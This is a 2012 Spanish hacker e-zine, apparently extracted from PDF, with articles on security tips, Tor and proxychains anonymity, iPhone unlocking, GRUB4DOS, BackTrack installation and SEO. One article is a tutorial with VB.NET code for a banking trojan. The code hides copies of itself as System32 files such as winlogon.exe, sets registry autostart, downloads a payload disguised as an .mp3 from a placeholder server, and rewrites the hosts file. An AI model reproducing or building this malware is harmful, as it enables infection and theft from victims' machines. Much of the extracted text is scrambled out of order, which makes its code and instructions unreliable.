E-Zine Dhackers.com

Page 1


DIRECTOR

http://dhackers.com

PRODUCCION

www.sie­group.net

PUBLICIDAD Y DIFUSION www.turundus.net

ARTE Y DISEÑO

Josue Juarez Quezada

COLABORADORES Noely noe_c20@hotmail.com

m3x1c0h4ck design­by­jos@hotmail.com SeNeGe senege@gmail.com

arthusu arthusuarthusu@gmail.com

locutus |_ocutuslocutus@el­hacker.org IPepe iipepe@gmail.com

nomo11 aldolopez_11@hotmail.com RandomSoft random.soft@hotmail.com eb4bgr

Angel cantu jauregui angel.cantu@sie­group.net

CONTENIDO

CONTRASEÑA P.38 OBTENER DE FACEBOOK P.14 P.42 P. 4 P.30 P.24 P.18 P.32 P.34 P.10 P.28 P. 8 P.20 P. 5 P.16 P.40

Noticias del Primer Semestre del 2012 Fotomontaje 10 Pautas de Seguridad Entrando a un equipo con Armitage Fail2Ban Instalando BackTrack 5 r2 Trucos Windows 7 Conociendo mi PC Liberar iPhone 3G/3GS sin WiFi Baseband 6:15 Procedimiento de Desbloqueo de Celulares. Troyano Bancario en Visual Studio .NET SEO Google Privacidad en Internet­ Proxy TOR Ejemplos de Inicio de Grub4dos Levantando el Hyper Linux ­ Parte 1


LA MEJOR COMUNIDAD DE HACKERS EN LATINOAMERICA

http://foro.dhackers.com/


10 Pautas de Seguridad

D

aremos las recomendaciones mas fáciles e imprescindibles para tener una seguridad fiel y que nuestro OS no se convierta en una maquina llena de virus y moustros que terminen con el sistema.

1 ­ Tener siempre instalada una suite de seguridad o programas que estén separados que incluyan antivirus, firewall y detención de malware y en el correo y siempre verificar que estén actualizados correctamente. 2 ­ Nunca divulgar nuestra dirección de correo electrónico, si no son personas confiables, pasa en muchos casos que las personas se pasan mostrando y dando a conocer su dirección por internet y paginas de ocio a si como de redes sociales sin saber el peligro que esto causa, antes primero saber que que el sitio en común es seguro. También es importante tener muchas cuentas alternativas (con diferentes contraseñas) y a si no tener que mantener mucho spam en una sola cuenta y hacer un backup en cada cuenta por si a caso. 3 ­ Nunca abrir un archivo adjunto sin antes pasarle el antivirus, unas de las recomendaciones que doy es que es importante si en el momento no tienes antivirus que no es recomendable, ver la extencion de la misma, recordemos que la mayoría de los virus tienen extencion “exe” pero pueden estar camuflados por otra extencion engañosa. 4 ­ Siempre tener en cuenta a quien agregamos o aceptamos en nuestra cuenta de mail, ya que a veces son intrusos que quieren que revelemos nuestra identidad a si como privacidad, un ejemplo son personas que siempre estan permanentemente preguntando cosas en común y nunca dejan que vos pregunte de la misma a si como intentan hacer una confianza lo mas rápido posible y lo logran, (a eso se llama Ing Social). 5 ­ Nunca seguir enlaces de correos electrónicos que vienen de un mail, preferible copiar la dirección y ponerla en el navegador a si podrás tener mas control de ella. 6 ­ Siempre tener en cuenta y seguridad a donde vamos a enviar nuestras fotos o archivos por medio de seguridad ya que esos archivos pueden revelar nuestra identidad y privacidad de la misma. 7 ­ Nunca reponder correo basura a si llamado spam. 8 ­ Pasa usar un buen navegador pero tenemos muchas alternativas como Intenret explorer, Opera, Firefox, Chrome etc… (recomendado Opera) y siempre ver tener activado “No Script” Como lo tiene Firefox.

4

SeNeGe


Privacidad en Internet ­

s

i estas leyendo esto es por que

estas preocupado por cuidar tu

privacidad mientras navegas (o haces cosas q no deberias), en cualquiera de los casos es una sana

preocupacion ya q cada vez es mayor la cantidad de datos q

dejamos por ahi y las ganas de los gobiernos y grandes

encima para cruzarlos con los suyos propios con oscuros propositos...

en españa por ejemplo ya se aprobo

la ley SINDE, entre cuyas atribuciones esta la de cortar el acceso a internet a los users q violen derechos de autor. mas alla de la ridiculez de la medida contra el usuario final que baja un

mp3, tengan en cuenta que hay toda una organizacion que checkea logs, pide mas logs y va a buscar gente a la

casa para cortarle la conexion a internet. ellos saben todo lo

que estas haciendo te guste o no,

cuando piden esos

registros ahi no esta

solo el link del mp3 sino

completamente todo lo q navegaste o hiciste.

obviamente en todos lados se

guardan logs pero afortunadamente en la mayoria de los paises se

necesita de una orden judicial y una

buena razon para obtenerlos y cuando digo "buena razon" no me refiero a

alguien bajando musica o un capitulo de "walking dead".

pero dejemos de divagar y vamos al tema...

5

|_ocutus

en este caso no es "salir" a internet

sino usar el "puente" para esconder

servidores proxy

nuestra direccion IP original.

difundido y comun para ocultar nuestra direccion IP son los proxies. un proxy

un proxy es un servidor es un servidor que que cumple la funcion de cumple la funcion intermediario en una de intermediario en una conexion, conexion.

corporaciones de ponerles las manos

TOR

por ejemplo en

una empresa el proxy es la maquina

que da acceso a internet a las de la red interna. desde ahi podemos controlar

trafico, aplicar permisos a los clientes y

muchas otras cosas, pero lo importante para lo que estamos viendo es la

funcion de hacer de "puente" hacia afuera.

supongamos q queremos abrir

xxxx.com. la pc de la red interna hace la peticion al proxy y este a su vez la

hace a xxxx.com despues de analizarla y

checkear en sus

reglas si la procesa o no. "xxxx", como cualquier web

server, guarda logs de las IPs que lo visitan, en este

caso la IP que queda en el log es la del

proxy y no la de la maquina interna que ni siquiera posee conexion directa

hacia afuera. de esta forma cualquiera que sea la pc en la red interna que

haga una peticion a xxxx siempre va a quedar en sus logs la IP del proxy. solo tenemos que pasar esto a nivel de internet y vemos claramente lo q hace un

haciendo una rapida busqueda en

google pueden encontrarse muchas

listas de proxies. si bien en teoria todo funciona como explique antes, los

proxies tambien guardan logs y ante

una orden judicial la mayoria de estos los entregan a las autoridades

correspondientes. una solucion usada durante muchos años es "encadenar"

proxies, haciendo q la peticion pase x varios de ellos antes de llegar a

destino. esto no hace imposible seguir el rastro de los paquetes pero si lo

hace mas dificil al tener que conseguir y analizar logs de varios lugares,

dependiendo de leyes locales y otros factores en todo caso es la solucion de anonimato mas rapida ya que se puede configurar practicamente en cualquier navegador y sistema

(incluyendo moviles) rapidamente y sin tener q instalar absolutamente nada. solo una lista de proxies q funcionen...

TOR

TOR fue originalmente diseñado para encriptar comunicaciones

gubernamentales de la "us navy". es

una red formada x nodos a traves de

los cuales viaja nuestra informacion x

rutas aleatorias. esta ruta, ademas de la info q viaja a traves de ella, esta

encriptada y cada uno de los relays en

TOR fue originalmente diseñado para encriptar comunicaciones

proxy. la peticion sale de la

pc hacia nuestro ISP (Internet Service

Provider), va hacia el proxy y el la hace

devolviendonos el resultado. la finalidad

la red solo sabe de cual viene la info y a cual va, no conoce el

destino final ni el

origen. la idea es crear un ruteo complicado, cambiarlo cada 10 minutos y no mantener logs.


el sistema parece perfecto... y es bastante

interfaz web. tiene infinidad de

para el uso normal asi q ya esta

nuestra privacidad. los sitios web toman

pero con la configuracion casi x default

conexiones en el puerto 9050.

bueno, pero esta lejos de proteger 100%

bastante mas info como el tipo de browser,

sistema, resolucion de pantalla, referals, etc, etc, etc.

ademas de esto, x la estructura de la red tor

opciones... es cosa de darle un rato sale andando. al final instalamos y configuramos todo... ;)

proxychains

corriendo y escuchando

como prueba pueden agregar en el navegador los datos de proxy socks como localhost en ese puerto y ya deberia estar

funcionando. en firefox vamos a:

es posible sniffar datos en texto plano con

el problema viene muchas veces

detalle como xq se extiende mucho el tema

conexion de consola. en un browser es

en "connections" hacemos click

le puede poner proxy casi a todo,

campos:

bastante facilidad. no voy a explicar en

pero la vulnerabilidad se basa en el ultimo

tramo de la ruta, del ultimo nodo al server de destino, donde la informacion viaja sin

encriptacion alguna. solamente hay q setear tor como "exit node" para ser ese ultimo

eslabon y ponernos a sniffar todo el trafico q pasa x el...

PRIVOXY en la mayoria de los tutoriales de instalacion de TOR se incluye PRIVOXY. esto se debe

cuando queremos anonimizar una

facil de configurar y aunque en linux se siempre hay algo q falta o no es

edit ­> preferences ­> advanced ­> network

en "settings" y completamos los

comodo andar editando archivos de configuracion todo el tiempo para

usarlos solo un rato. con proxychains no solo podemos pasar cualquier cosa a traves de un proxy sino q

facilmente podemos crear cadenas

como las q hablabamos al principio o simplemente redirigirlo a tor.

a q con este ultimo podemos ocultar mucha

en caso de usar propios las listas

aplicaciones cuando se conectan a internet

distintos. aleatorio, orden exacto o

el siguiente paso es configurar

sacar de la cadena proxies muertos.

/etc/privoxy/ y editamos el

de la informacion que entregan nuestras

pero tambien a q en firefox hay un problema con el soporte para socks (q usa tor) q

genera timeouts, lo cual resulta en paginas

pueden encadenarse de 3 tipos

dinamico q es capaz de identificar y

privoxy. nos vamos a

archivo "config", al final

q no cargan aleatoriamente y ese tipo de

puede usarse practicamente con

espera q se complete el circuito en la red y...

ssh, wget... o lanzar aplicaciones

forward­socks4a / localhost:9050 .

otro serio problema con tor son los "DNS

# proxychains ssh root@.....

con esto lo q hacemos es redirigir el

se hace una peticion normal a un server

# proxychains pidgin

corre en el puerto 8118, de manera q

problemas. simplemente firefox a veces no timeout!

leaks" o fugas dns. antes de enviar los datos DNS para resolver el nombre para recien

entonces encriptarlos y enviarlos. el trafico

sigue estando a salvo pero no la actividad q

cualquier aplicacion de consola, nmap, graficas, simplemente:

# proxychains nmap ­sT .....

Instalando y configurando todo

es facilmente rastreable. esto se soluciona

la explicacion va para debian y sus

leaks. la idea entonces es instalar privoxy, q

ubuntu q es lo q usa la mayoria (yo sigo

usando privoxy que justamente evita los dns este "limpie" todos estos datos segun el

nivel en q se lo pidamos y le pase la peticion a tor. este crea el circuito, la envia y

despues de atravesarlo llega a destino. la aplicacion se puede configurar con un

simple editor de texto o desde una intuitiva

6

derivados, obviamente sirve perfecto para

agregamos la linea:

(con el punto al final incluido)

trafico de privoxy a tor. privoxy

con esos datos configuramos ahora

el navegador pero en lugar de "socks host" usamos "http proxy" y

checkemos "use this proxy server for all protocols".

prefiriendo el original... je). empezamos x

para configuracion mas fina se

encuentran en los repositorios:

accede x medio de la url:

descargar e instalar las 3 aplicaciones q se # apt­get install tor privoxy proxychains

puede usar la interfaz web a la q se

(con sudo en ubuntu)

http://config.privoxy.org/

Tor no necesita mayor configuracion

de ahi vamos a:


"View & change the current configuration" (http://config.privoxy.org/show足status) y

podemos modificar muchisimas opciones, desde cambiar el user足agent hasta sacar las animaciones a los GIFs.

otra opcion interesante es hacer q privoxy escuche conexiones de toda la lan,

pudiendo asi tener una sola maquina

corriendo tor y privoxy para usarla desde

cualquiera en la red. para eso agregamos al final la linea:

listen足address x.x.x.x:8118 donde x.x.x.x es la ip de la pc local q esta corriendo privoxy. despues de esto se

puede configurar como proxy en cualquier pc conectada a la lan.

finalmente nos queda proxychains para usar aplicaciones de consola. vamos a

/etc/ y editamos "proxychains.conf". al final agregamos (o descomentamos): socks4 127.0.0.1 9050 enviando el trafico a tor. por las dudas

asegurense de q strict_chain y proxy_dns esten descomentados. si quieren poner una lista de proxies este tambien es el lugar en el formato q esta arriba.

epilogo... todo esto sirve para tener un anonimato

aceptable pero tampoco significa q seamos "inrastreables" ni mucho menos ante una investigacion "seria". para ser

completamente anonimos en una accion puntual lo mejor es usar un sistema

operativo en un CD/DVD booteable y

conectarse a una red publica bien lejos de

cualquier lugar q pueda relacionarse con la persona q la realiza.

si vas a hacer algo en algun punto "ilegal",

no te sientas intocable x usar tor... si vas a hacer algo ilegal... mejor no lo hagas. 余)

7


Troyano Bancario

(Parte I)

S

aludos queridos amigos, en esta oportunidad

os enseñare a crear un pequeño troyano bancario, para eso tenemos que tener el programa: Visual

Studio .Net 2010 ­ Professional (de preferencia). Bueno iré al grano, luego determinaremos las funciones que tendrá nuestro troyano. Funciones: 1. AUTOCOPIA Y OCULTACIÓN. 2. AUTOARRANQUE.

3. VERIFICACIÓN DE INTERNET.

En conclusión tendremos una condición como esta:

Public Sub AutoCopy() If

File.Exists(“C:\Windows\System32\winl

empiecen a crear sus FlujoGramas,

Pseudocódigos y todo ese rollo que uno tiene que

hacer al crear un Software, pero como no estamos para perder el tiempo, iremos directo al grano, claro que al hacer todo ese rollo nos facilitará

hacer la programación más completa y ordenada, pero al diablo con eso.

1. Autocopia y Ocultación: Para continuar con este procedimiento tenemos primero que verificar si el troyano se encuentra almacenada en la computadora, para eso utilizaremos el código:

File.Exists(“C:\directorio donde haremos que se almacene el troyano”)

Luego de eso podremos usar el código de copiar:

File.Copy(Application.ExecutablePath.ToStri ng, “C:\directorio donde haremos que se almacene el troyano”, True)

Y no os olvidáis del atributo de Ocultación, para eso utilizaremos este código:

File.SetAttributes(“C:\directorio donde

haremos que se almacene el troyano”, FileAttribute.Hidden)

8 RandomSoft

Return True

3. Verificación de Internet:

, True)

En esta función lo que haremos será

32\windrivers.exe”,

encuentra nuestro troyano dispone de

“C:\Windows\System32\windrivers.exe” File.SetAttributes(“C:\Windows\System FileAttribute.Hidden) Else

“C:\Windows\System32\winlogon.exe”,

bancario, si lo queréis hacer más formal, entonces

End Try

oString,

File.Copy(Application.ExecutablePath.T

6. REPETIR T.A.

podemos empezar a crear nuestro troyano

Catch ex As Exception

End Function

File.Copy(Application.ExecutablePath.T

Después de tener bien claras nuestras funciones,

haremos que se almacene el troyano”)

ogon.exe”) Then

4. DESCARGA DE ARCHIVO. 5. INFECCIÓN DEL HOSTS.

nuestro registro”, “C:\directorio donde

oString, True)

File.SetAttributes(“C:\Windows\System

32\winlogon.exe”, FileAttribute.Hidden) End If

End Sub

2. Autoarranque:

verificar si el ordenador donde se

internet y así de esa manera poder

habilitar algunas funciones y evitar que se ejecuten en vano en caso de no disponer con internet, para eso

utilizaremos esta sentencia de códigos: Public Function VerifyInternet() As Boolean

Try

If

My.Computer.Network.IsAvailable = True Then

Return True

Esto nos ayudará a ejecutar

Else

que inicie el sistema operativo, para eso

End If

automáticamente nuestro troyano cada vez tenemos que conocer el registro de Windows y crear un registro en el

directorio de arranque de la ubicación

Return False

Catch ex As Exception Return False

End Try

donde se encuentra almacenada nuestro

End Function

declaramos la variable:

4. Descarga de Archivo:

Dim Calculate As RegistryKey

Ahora procederemos a descargar nuestro archivo de infección para el hosts, utilizamos este pequeño código:

troyano y ponerle un nombre, ante todo

Private Function AutoArranque() As Boolean

ListRun =

"SOFTWARE\Microsoft\Windows\Current Version\Run"

Registry.CurrentUser.DeleteSubKeyTree(L istRun)

Try

Calculate =

Registry.CurrentUser.CreateSubKey(ListR un)

Calculate.SetValue(“Nombre de

My.Computer.Network.DownloadF ile(“URL de nuestro archivo de infección”, “C:\directorio donde se almacenará la descarga”) Pero antes de iniciar la descarga de nuestro archivo tenemos que verificar si la URL se encuentra


disponible, para eso tenemos que declarar las variables de esta forma: Dim PositionValue As WebRequest Dim ResponseHtml As HttpWebResponse Dim Declared As String Public Function Verify_URL(ByVal

URL_Only As String) As String Try PositionValue = WebRequest.Create(URL_Only) ResponseHtml = CType(PositionValue.GetResponse(), HttpWebResponse) Declared = ResponseHtml.StatusDescription() Catch ex As WebException End Try Return Declared End Function

String

El código que nos servirá para leer el contenido de nuestro archive es este: ColumnValue =

File.ReadAllText(“C:\directorio del archive a leer el contenido”)

Y el que nos permitirá reinscribir el

contenido de nuestro archivo es este otro: File.WriteAllText(“C:\directorio del contenido que escribiremos”)

Public Function Infecion() As String On Error Resume Next ColumnValue =

File.ReadAllText(“C:\cuentas.txt”) CountPerformance =

ColumnValue.ToString()

If CountPerformance <> "" Then

Public Sub CopyrightInf() If VerifyInternet() = True Then If Verify_URL(“http://www.miservidor.c om/infeccion.mp3”) = ConditionValue Then My.Computer.Network.DownloadFile( “http://www.miservidor.com/infeccion. mp3”,“C:\Windows\System32\wieurkd n.dll”) End If End If End Sub

End Function

contenido del archivo que descargamos y luego reinscribir el contenido de nuestro archivo hosts, para eso declaramos una

varible de tipo string el cual contendrá la información:

9

Para que un programa sea un troyano sólo tiene que acceder y controlar la máquina anfitriona sin ser advertido.

File.WriteAllText(“C:\directorio del

archive a reinscribir”, “Hola Mundo by

Aquí lo único que haremos será leer el

es para un fin educativo, el grupo DHackers y mi persona no nos hacemos responsables del mal uso de esta revista, para cualquier dudo o para mayor información no duden en contactarme.

Saludos de RandomSoft.

archive que reinscribiremos”, “Aquí el

Después haremos una condición para proceder con la descarga

5. Infección del Hosts:

Bueno amigos eso es todo por el momento, por motivos de seguridad no coloco el script completo o el resultado final, esta E­Zine DHackers

Dim ColumnValue, CountPerformance As

RandomSoft”) End If

6. Repetir T.A: En esta función necesitaremos de un Timer para repetir las demás funciones que anteriormente hicimos, ante todo declararemos las variables. Dim d As Integer Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick d=d+1 If (d = 500) Then Try AutoArranque() d=0 Catch ex As Exception End Try End If End Sub


Liberar iphone 3G/3GS sin wi-fi base band 6.15

E

sta vez les traigo un tutorial de como liberar nuestro iphone sin wi­fi Muchos sabrán que los iphone se liberan por el wi­fi... Esta vez utilicé un 3GS con la versión 5.0.1 que es la última versión (En algunos casos no se pudo liberar con dicha versión, a si que, si no

Ultrasn0w 1 .2:

Ifunbox:

http://www.mediafire.com/?plo7alk33tn2soc

http://dl.i­funbox.com/ifunbox_en.zip

les funciona tendrán que hacerle downgrade) Necesitamos los siguientes archivos a descargar.Tener nuestro iphone previamente hecho Jailbreak ya que los archivos se instalan en Cydia. Y por supuesto con base band 6.15

Abrimos el Ifunbox con nuestro iphone conectado. Casi no hay explicación ya que las imágenes hablan por sí solas…

10

nomo11


11


En la carpeta "AutoInstall" arrastramos los archivos que descargaron “Ultrasn0w� son 2 archivos, los arrastramos a la carpeta.

12


Nota: Si alguna carpeta no aparece en su iphone, háganla ustedes mismo tal y cual como muestra las imágenes, con mayúsculas y minúsculas, ya que si no lo hacen a sí, no lo reconocerá su iphone.

13


Notic

Noticias

ENERO

Megaupload y megavideo dicen adiós, El FBI cierra el mayor sitio de intercambios El departamento de Estado de EE.UU. , el FB I y otras autoridades internacionales decidieron clausurar Megaupload y detener a sus responsables , acusados de conspiración para cometer un crimen organizado , lavado de dinero , infracciones de derechos de autor de forma masiva y violación de la propiedad intelectual , lo cuales podrían enfrentar una cadena de hasta 50 años de prisión. Esta operación fue dirigido en contra de Megaupload (por intercambio de archivos) y Megavideo (visualización de videos en internet) . Ambas son propietarias de la misma compañía. El departamento de Justicia acusa a sus responsables de la piratería masiva en todo el mundo de diferentes obras protegidas por derechos de propiedad intelectual

FEBRERO

MySpace volvió y ya tiene nuevos usuarios

El retorno de MySpace ( en el 2005 y 2008 había sido el sitio

más visitado) había perdido a sus usuarios debido al gran boom de Facebook y otras redes sociales .

En el 2012 luego de un cambio de dueños y

estrategias , gracias a la frase “si no puedes con tus

enemigos únete a ellos” , hizo que cada día se abran 40 mil nuevas cuentas . Aprovecharon las 42

millones de canciones de las que dispone la red social , la convirtieron en un nodo de música y entretenimiento para compartir en Facebook y Twitter.

Sony Ericsson ahora se llama Sony Mobile Communications

La compra de Sony había sido anunciada en

octubre del 2010 pero recién este año se hizo efectiva la compra.

http://www.infobae.com/adjuntos/jpg/2011/11/60 0x0_484482.jpg

Sony Mobile Communications integrará el

segmento de celulares como un elemento vital de su negocio de la electrónica.

MARZO El debut en España de la ley Sinde A partir de esta normativa se creó una comisión gubernamental que será el ente regulador encargado de evitar las descargas ilegales y además tienen autorización a cortar el acceso de la web a los usuarios que violen los derechos de propiedad intelectual. http://www.infobae.com/adjuntos/jpg/2011/01/600x0_336614.jpg Esta norma fue aprobada en el Congreso de España en el año 2011y conto con el apoyo de entidades de gestión de derechos de autor y la industria audiovisual. Paypal presentó un nuevo dispositivo de pagos vía celular Paypal presento un dispositivo que ayuda a las empresas a aceptar tarjetas de crédito y de débito. http://www.infobae.com/adjuntos/jpg/2012/03/600x0_520529.jpg Paypal Here es una aplicación móvil que se instala en celulares , por el momento solo funciona con el iPhone. Más adelante servirá a los equipos con Android de Google. Este sistema permite a los comercios a aceptar pagos mediante dispositivos portátiles.

14

Noely


cias Primer semestre del año

ABRIL

Firefox presento su nueva versión "Firefox 12" Mozilla presento su nueva versión para Windows , Mac y Linux.En él se destaca la actualización del navegador , que se hace de manera más rápida y sencilla y mejoras en las prestaciones para los desarrolladores (medios de control para la reproducción de videos HTML 5 y JavaScript). http://www.infobae.com/adjuntos/jpg/2012/ 04/600x0_532059.jpg Pinterest, la red social que consiguió el tercer puesto de popularidad en EE.UU. Esta red social que permite compartir y recomendar imágenes entre usuarios creando un portafolio temático , aumento en enero y febrero con un 50 % de visitas de EE.UU. , posicionándose en el tercer puesto de las más populares (Facebook en el primer puesto y segundo Twitter) .Este aumento de visitas fue gracias a una recomendación de la revista Time. http://www.infobae.com/adjuntos/gif/2012/ 02/600x0_511141.gif

MAYO

Celebración del día de Internet Las Naciones Unidas decidieron designar como el 17 de Mayo como el Día Mundial de las Telecomunicaciones y de la Sociedad de la Información. “Este día servirá para dar a conocer mejor la importancia que tiene este recurso mundial , surge de la sociedad , por la sociedad y para la sociedad “. http://www.youtube.com/watch?v=i4RE6dBAjH 4&feature=player_embedded

JUNIO Twitter presento su nuevo logo Ahora se la identificara solo con el pajarito azul , este logo surgió de un amor por la ornitología y el diseño simple y efectivo. http://www.infobae.com/adjuntos/jpg/2012/06/ 600x0_548255.jpg Este nuevo logo sugiere el buen momento que atraviesa Twitter y el exitoso futuro que le aguarda.

15


Ejemplos de inicio con

GRUB4DOS

Seguro que muchos de vosotros os

independientemente del que sea:

cómo iniciar varios Sistemas

title Boot from Hard­Drive\n

USB, o desde el propio CD/DVD. Hay

chainloader (hd0,0)+1

habréis preguntado más de una vez Operativos desde un mismo dispositivo varias herramientas que facilitan esta tarea, pero con un poco de tiempo

podréis conocer una de las mejores, GRUB4DOS.

En este artículo os quiero mostrar

varios ejemplos de lo que podéis hacer con este magnífico BootLoader. Todos los ejemplos son reales y funcionan con GRUB4DOS 0.45 editando el archivo menu.lst

Empezaremos con algo sencillo, cómo

cargar la imagen de un Floppy Disk de

inicio. Para hacer esto se soportan los formatos .Img y .Gz por lo que el archivo de la imagen de vuestro

disquette puede estar comprimido y ocupar menos espacio: title

Disk\n

Windows 98 Floppy

find ­­set­root

/mypath/win98dos.gz

title

boot

find ­­set­root ­­ignore­

Ahora vamos a indicarle que cargue en

la memoria R.A.M. la imagen .Iso de un Live‐CD y que la inicie. Esto es útil si no tenemos unidad de CD/DVD en

nuestro PC, pero tenemos que tener

memoria R.A.M. suficiente para cargar la imagen y para iniciar el Sistema Operativo que tenga el CD/DVD.

Únicamente hay un tipo de inicio que

GRUB4DOS no nos permite hacer, y es iniciar una imagen .Iso si el dispositivo de inicio es el propio CD/DVD. Para

poder usar este método, el archivo .Iso que contenga la imagen de nuestro

title

Windows 9x\n

floppies /mypath/ubuntu­ 12.04­desktop­i386.iso

map /mypath/ubuntu­12.04­ desktop­i386.iso (0xff) map ­­hook

root (0xff)

kernel /casper/vmlinuz

boot=casper BOOT=casper iso­ scan/filename=/mypath/ubuntu ­12.04­desktop­i386.iso

persistent rw splash vga=791 max_loop=255

initrd /casper/initrd.lz boot

www.boot‐

usando el método más fácil.

desfragmentado. Más información en land.net/forums/index.php?showtopic= 8797 / www.boot‐

land.net/forums/index.php?showtopic= 5041&st=20

find ­­set­root ­­ignore­

desde el HD:

Live­CD\n

Ahora vamos a iniciar un PC que

boot

para iniciar Windows 9x, esta vez

Ubuntu 12.04 Linux

CD/DVD tiene que estar

title My .Iso Image in

Ahora haremos una pequeña variante

Linux:

rootnoverify (hd0,0)

kernel /mypath/memdisk

initrd /mypath/win98dos.gz

ejemplo en concreto es para Ubuntu

R.A.M.\n floppies

/mypath/myisoimage.iso

map /mypath/myisoimage.iso (0xff) || map ­­mem

/mypath/myisoimage.iso (0xff)

tenga instalado Windows Xp en el HD, GRUB4DOS soporta varios tipos del Sistema de Archivos, incluyendo

FAT32, NTFS y NTFS comprimido: title MicroSoft Windows Xp\n rootnoverify (hd0,1)

chainloader (hd0,1)+1

find ­­set­root ­­ignore­

floppies ­­ignore­cd /NtLdr chainloader /NtLdr boot

Y el mismo inicio usando un método alternativo:

find ­­set­root ­­ignore­

map ­­hook

chainloader /Io.Sys

boot

title MicroSoft Windows Xp\n

Y aquí una pequeña variante si nuestro

floppies ­­ignore­cd /NtLdr

floppies /Io.Sys boot

También podemos indicarle que inicie

el PC desde el Sistema Operativo que haya en nuestro HD,

16

eb4bgr

chainloader (0xff)

PC no tiene suficiente memoria R.A.M.

y queremos iniciar la imagen .Iso desde el archivo que la contiene. Este

find ­­set­root ­­ignore­ map () (hd0) map (hd0) () map ­­rehook


find ­­set­root ­­ignore­

floppies ­­ignore­cd /NtLdr

Para instalar el cargador de

boot

utilizar las herramientas que vienen

chainloader /NtLdr

Vamos a usar el mismo método para iniciar Windows Vista/Seven:

GRUB4DOS en el sector MBR podéis con el programa. Lo más sencillo es

iniciar nuestro PC con la herramienta Hiren's Boot‐CD

(http://www.hirensbootcd.org/downlo

title MicroSoft Windows

ad), y desde el menú de herramientas

find ­­set­root ­­ignore­

Grub4Dos Installer. Después de esto,

map () (hd0)

queréis poner el cargador de

map ­­rehook

en el HD) y pulsais en el botón

floppies ­­ignore­cd /bootmgr

archivo GrLdr al directorio raíz de la

boot

sector MBR con el cargador de

Vista/Seven\n

de HBCD seleccionar el programa

floppies ­­ignore­cd /bootmgr

seleccionais la unidad USB en la que

map (hd0) ()

GRUB4DOS (también podeis hacerlo

find ­­set­root ­­ignore­

"Install". Después hay que copiar el

chainloader /bootmgr

partición donde habeis modificado el

También podemos indicarle que inicie Ubuntu Linux en una partición de

nuestro HD. Antes de hacer esto hay

que entrar en la Línea de Comandos de

GRUB4DOS y ejecutar la orden "UUID", que es la que nos muestra los

identificadores de las particiones:

GRUB4DOS, y que esa partición esté marcada como activa para iniciarse.

AVISO IMPORTANTE: Si instalas

GRUB4DOS en la misma partición del HD donde tengas instalado Windows

Vista/Seven, te elimina la información de licencia de Windows y tu copia

aparecerá como no registrada. Este hecho no se produce si instalas

title Ubuntu 11.04 Linux\n

Ubuntu Linux en un PC con Windows

7117f617ac4a

GRUB, el proyecto original. Tened

root=UUID=071e0978­fb77­4d32­

Como habéis podido ver, este

vga=791 max_loop=255

hacer prácticamente todo lo que

boot

os haya resultado útil.

Para finalizar, os muestro unas pocas

Alejandro Padrino.

uuid 071e0978­fb77­4d32­934e­

Vista/Seven. Ubuntu Linux utiliza

kernel /vmlinuz

cuidado.

934e­7117f617ac4a ro splash

excelente BootLoader nos permite

initrd /initrd.img

deseamos. Espero que este artículo

cosas más que se pueden hacer con GRUB4DOS.

Línea de comandos de GRUB4DOS: title Grub4Dos Command­Line\n commandline

Reiniciar el PC:

title ReBoot Computer\n reboot

17

http://grub4dos.sourceforge.net


Instalando el sistema operativo backtrack 5 r2 Bienvenidos a la ezine dhackers… bueno en este articulo les enseñare a instalar este increíble sistema operativo llamado backtrack 5 r2 Ahí es la opción para iniciar podemos

iniciar de diferentes maneras backtrack nosotros usaremos la primera Defaul

aunque puedes usar sin red, sin driver y memoria de intercambio, modo seguro,

memstest(para comprobar tu memoria ram) y bootear desde el disco duro :P

Ahi es la opcion para iniciar

podemos iniciar de diferentes maneras backtrack nosotros

usaremos la primera Default

aunque

puedes usar sin red, sin driver y memoria de intercambio, modo

seguro, memstest(para comprobar tu memoria ram) y bootear desde el disco duro:

Nos saldrá la siguiente pantalla ahí le ponemos:

Startx

Para iniciar el modo grafico

18

arthusu


Configuracion del teclado

Otro paso muy importante es que podemos instalar backtrack como una partici贸n de disco duro y usar dos sistemas

operativos a la ves, pero para no enrollarnos lo instalamos en todo el disco duro y a probar.

Le damos Borrar y usar el disco entero y Adelante

Ya solo hay que esperar a que se llene al 100% la instalaci贸n

Por ultimo backtrack nos avienta un login, para ello los datos por defecto son: Bt login: root Password: toor Y listo solo inicias el modo grafico con Startx ahora si a probar backtrack

19


SEO

Hola bueno, antes de que empiecen a leer este "manual" quiero dar mi opinion de que lo que esta puesto aca no esta actualizado y eso quiere decir que google no siempre usa las mismas técnicas de

búsquedas y de mediciones para la info, también quiero decir que a pesar de hacer todo lo que dice eso no va a decir que vamos a estar primeros ya que es todo relativo, y la mejor forma de durar es con

google que localiza una pagina, se guarda la informaci?n sobre la

misma, la analiza, la pasa a un editor, y a esa pagina se le da una nota. Una nota entre el 1 y el 10. A esa nota se le conoce como PageRank.de 2/10

el tiempo, osea mientras mas

?Como puedes saber el PageRank de las p?ginas que visitas?

cuenta.

F?cil, con una herramienta, la Googlebar. Descargal? e instalal?:

Manual para mejorar tu

Aqui teneis el enlace ara los que usan Explorer y para los que usan un

(Rollo Barrio Sesamo),

saber cual es el page rank de una p?gina, si no que incluso podremos

tiempo en la red mas te tendran

posicionamiento en Google. Google es el "pupo buscador" por excelencia. De hecho hay

buscadores y luego hay Google, y punto.

Hacer que tu pagina aparezca en Google es m?s que sencillo, de

navegador de verdad, Modzilla. Con la googlebar, podremos no solo "VOTAR" a esa p?gina para que google tenga una referencia de

nuestros gustos. Adem?s incluye otras interesantes opciones que ya ir?is descubriendo.

?Me hablas un poco m?s del Page Rank?

hecho basta con que alguien que ya este indexado en su base de

Pues para que os hag?is una idea:

encontrar?. (Google siempre te encuentra por que google manda)

importante, ?sea, que cualquier palabra que se escriba en esa Web, es

datos, haga un link desde su pagina a la tuya, y Google te Tambien puedes sugerirle que lea tu pagina desde aqu?

Ahora, la gracia est? en estar bien posicionado, ?sea, aparecer en

Una pagina Web que tiene un page rank 5/10 o 6/10 es una p?gina

una palabra que aparecer? casi siempre, en los primeros resultados de google: Consecuencia­> mogoll?n de visitas.

las primeras posiciones de b?squeda. Por que esta muy bien eso de

?Por qu? es interesante recibir visitas a tu p?gina desde google?

33.

­ En primer lugar por que mola :) . Y en segundo, por que eso quiere

decir: Eh, Eh, que aparezco en google.­ Cuando sales en la pagina

?Como funciona Google?, ?Que es el posicionamiento? Google usa un algorritmo (No, eso no se baila) de b?squeda

bastante complejo, pero muy efectivo. (Aunque ?ltimamente

comience a ir como un culo). Ese c?lculo de google se encarga, en

parte, de valorar la calidad o importancia de una pagina. Google de

decir que llegara gente que se interesa por lo que escribes.

